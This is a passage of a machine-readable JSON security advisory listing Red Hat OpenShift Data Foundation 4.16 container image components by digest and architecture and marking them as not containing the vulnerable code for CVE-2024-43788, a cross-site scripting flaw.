"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
